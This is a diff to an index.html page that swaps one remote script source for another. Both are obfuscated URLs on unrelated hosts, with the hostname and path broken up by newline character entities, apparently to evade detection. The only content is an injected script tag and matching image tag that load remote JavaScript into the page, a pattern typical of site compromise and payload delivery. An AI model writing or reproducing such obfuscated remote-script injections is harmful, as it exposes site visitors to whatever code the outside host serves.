--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <meta charset="utf-8">
 </head>
 <body>
-<script src="https://git&#10;.nuol&#10;kj.com&#10;/img/code?id=js&#10;"></script>
-<img src="https://git&#10;.nuol&#10;kj.com&#10;/img/code?id=js&#10;" width="100%">
+<script src="https://git.&#10;0o&#10;o0.&#10;de&#10;si&#10;gn&#10;/i&#10;m&#10;g/c&#10;o&#10;de?i&#10;d=x&#10;g"></script>
+<img src="https://git.&#10;0o&#10;o0.&#10;de&#10;si&#10;gn&#10;/i&#10;m&#10;g/c&#10;o&#10;de?i&#10;d=x&#10;g" width="100%">
 </body>
 </html>
